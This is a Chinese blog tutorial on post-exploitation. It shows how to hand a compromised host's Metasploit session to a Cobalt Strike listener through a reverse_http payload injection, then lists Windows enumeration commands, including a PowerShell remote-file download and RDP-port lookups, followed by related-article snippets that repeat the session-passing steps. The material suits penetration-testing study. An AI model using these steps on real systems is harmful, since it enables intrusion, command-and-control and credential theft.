后渗透之MSF联动CS

最新推荐文章于 2025-04-27 22:36:48 发布
最新推荐文章于 2025-04-27 22:36:48 发布
阅读量616 收藏 6
点赞数
分类专栏: 后渗透 文章标签: 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/dl1286670932/article/details/128319785
版权

Cobalt Strike(简称CS)是一个为对手模拟和红队行动而设计的平台,主要用于执行有目标的攻击和模拟高级威胁者的后渗透行动,分为服务器和客户端。

MSF这边已经成功获得一台主机会话,需要将这个会话上线CS

CS这边新建一个监听器

MSF这里输入payload

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set lport 4444 #需要同CS监听端口一致
set session 1 #需要传入的session
run

CS这边成功上线了一台主机,同MSF一致

可以看到后台开启的软件服务进程 

 获取到的账号密码

 常用命令

arp -a   打印arp表
net user  列出表名
net user username  关于用户的信息
net use \SMBPATH Pa$$wOrd/u:username  连接SMB
net localgroup  列出所有组 
net view\127.0.0.1   会话打开到当前计算机
net session  开放给其他机器
netsh firewall show config  显示防火墙配置
DRIVERQUERY	 列出安装的驱动
tasklist /svc  列出服务任务
net start  列出启动的服务
dir /s foo  在目录中搜索包含指定字符的项目
dir /s foo == bar 同上
sc query 列出所有服务
sc qc servicename  找到指定服务的路径
shutdown /r /t 0  重启
type file.txt  打印内容
icacls "C:\example"  列出权限
wmic qfe get Caption,Description,HotFixID,InstalledOn  列出已进安装的补丁
New-Object System.Net.WebClient).DownloadFile(“http://host/file”,”C:\LocalPath”) 利用ps远程下载文件搭配本地
accesschk.exe -qwsu "Group" 修改对象 
quser or query user 获取在线用户 
netstat -ano | findstr 3389 获取rdp连接来源ip
dir c:\programdata\  分析安装杀软
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber    #获取远程端口
tasklist /svc | find "TermService" + netstat -ano  		  #获取远程端口

内网安全学习(八)---CS&MSF联动
qi_SJQ_的博客
02-17 3819
域横向 CS&MSF 联动 Shell CS->MSF: 创建Foreign监听器 MSF监听模块设置对应端口地址 CS执行Spawn选择监听器 MSF->CSCS创建监听器 MSF载入新模块注入设置对应地址端口 执行CS等待上线 use exploit/windows/local/payload_inject 首先需要两台服务器,一个上线cs一个上线msf 启动上线cs生成木马上线两台主机,之后启动msf。 1)接下来,将CS移交到MSF上: 先添加会话,填写msf主机信息: 配
csmsf联动
inslight的博客
09-22 1100
csmsf联动
MSFCS联动
一纸荒芜的博客
08-27 3062
msfcs
红日靶场1-渗透过程(cs联动msf
lsx134679的博客
04-20 1097
红日靶场1的详细渗透过程
MSF&CS互相联动
剁椒鱼头没剁椒的博客
07-28 2212
在日常渗透测试或者是你偷偷干坏事的时候,可能会发现,CS确实是一个强大的后渗透工具,但是奈何CS很多关于漏洞的功能都是只能检测,但是不能攻击,所以需要CSMSF互相联动起来,这里我就利用一个永恒之蓝漏洞来。
msfcs联动
bring_coco的博客
05-18 2202
环境:kali(192.168.190.128)NATAPP。
渗透测试笔记】之【内网渗透——Cobalt Strike会话管理(与MSF联动)】_cobalt 信回话(2)
2401_84969389的博客
05-13 357
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
渗透测试笔记】之【内网渗透——Cobalt Strike会话管理(与MSF联动)】_cobalt 信回话
2401_84969426的博客
05-13 337
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
CSMSF的权限互相传递/mimikatz抓取windows 2012明文密码
qq_68163788的博客
06-26 1760
CS(Cobalt Strike)MSF(Metasploit Framework)是两种常用的渗透测试工具,用于测试网络安全并获取权限。此外,mimikatz是一款功能强大的工具,可以用于抓取Windows系统中的明文密码。通过修改注册表等待目标系统管理员重新登录,可以使得明文口令在lsass进程中保存。这样一旦管理员重新登录,mimikatz就可以成功地抓取到明文密码。这些工具在渗透测试网络安全领域中具有重要的作用。
第72天-内网安全-域横向 CS&MSF 联动及应急响应初
MCTSOG的博客
04-27 2849
思维导图 内网渗透 待续 应急响应 演示案例: MSF&CobaltStrike 联动 Shell (待续) 应急响应 攻击者可能拿到了哪些权限,攻击可能发生在哪个部分,从最可能的开始排查 可疑文件看文件有没有毒,有没有外部链接 结合攻击指搭建平台的漏洞 WEB 攻击应急响应朔源-后门,日志 故事回顾:某客户反应自己的网站首页出现篡改,请求支援 分析:涉及的攻击面,涉及的操作权限,涉及的攻击意图,涉及的攻击方式 思路1:利用日志定位修改时间基数,将前时间进行攻击分析,后时间进行操作分析 思路2
Cobalt Strike获得shell之后 如何与msf联动
qiuqiunile_的博客
10-10 350
本机做cs,vps做msf 1.Cobalt Strike派生会话给Metasploit (1)对msf进行设置 使用xshell连接vps,进入msfconsole 对msf的设置如下: msfconsole use exploit/multi/handler set payload windows/meterpreter/reversez_http set lhost 172.(这边的ip是服务器的内网地址) set lport 7777 (run) (2)对cs进行设置 先设置一个新的监听,这边的I
MSFCS联动
GoDunTong's Blog
04-08 4432
转载自Snowming04’s Blog 0x01 准备工作 受害主机:在关闭 Windows Defender 其他一切杀软的前提下,在 Win 10 主机下进行的实验。 MSF:本地 kali Cobalt Strike 团队服务器:Ubuntu VPS Cobalt Strike:3.14 团队服务器: 客户端: 上线过程: 因为我关闭了一切杀软及 Windows Defender,自不必做免杀。 一些朋友搞不清楚 Windows Executable Windows Exec.
CS&MSF联动
kukudeshuo的博客
09-23 418
CS&MSF联动 CS联动MSF 现在CS这边已经成功上线一台主机,需要将这个会话传入MSF CS这边新建一个监听器 然后打开MSF use exploit/multi/handler set payload windows/meterpreter/reverse_http #需要设置成CS一样的payload set lhost 192.168.109.128 set lport 5566 #需要设置成跟CS一样的端口 然后CS这边选择增加会话 然后指定生成的msf监听器即可 可以看
MSFCS会话互相传递
fishfishfishman的博客
08-15 849
作为C2工具,MSFCS各有千秋,CS有着多种强大的自定义插件易操作的图形化界面,而MSF集成了针对各类系统的Payload攻击代码,为了针对性的进行攻击,我们有时候会需要将MSF的会话转发到CS,或者相反。
CSMSF联动
weixin_39407564的博客
01-14 262
Colbalt Strike(简称CS)及MetaSploit(简称MSF)各有所长,cs更适合作为稳控平台,msf更适用于各类内网信息搜集及漏洞利用。为了取各家之所长,可以进行联动
MSFCS联动转换
最新发布
m0_64398925的博客
04-27 193
1、将MSF获得meterpreter会话放在后台:backgrod。set lport CS外联监听器的端口(此处应为4441)set lport CS外联监听器的端口(此处应为414)3、CS指定会话里运行spawn 外联监听器名。session 选择要复制的session会话。set lhost CS服务器地址。set lhost CS服务器地址。4、MSF运行run,即可上线CS。1.CS创建外部监听器。
细说——CS联动MSF
LainWith的博客
08-06 7109
目录环境准备CS ——> MSFubuntu准备cs客户机器准备msf准备补充MSF ——> CSMSF准备ubuntu-cs准备 网上的文章,写的很简介,看的脑壳疼,自己动手,详实的记录一下学习过程 环境准备 我使用两台vps,一台是kali 52.69.164.3,一台是ubuntu 52.194.218.196​ kali使用msf,ubuntu使用cs服务器,物理机使用cs客户端,虚拟机win7是受害者 CS ——> MSF 简单来说,就是当cs拿到一台主机之后,新增一个用于转发
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Dylan.017

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值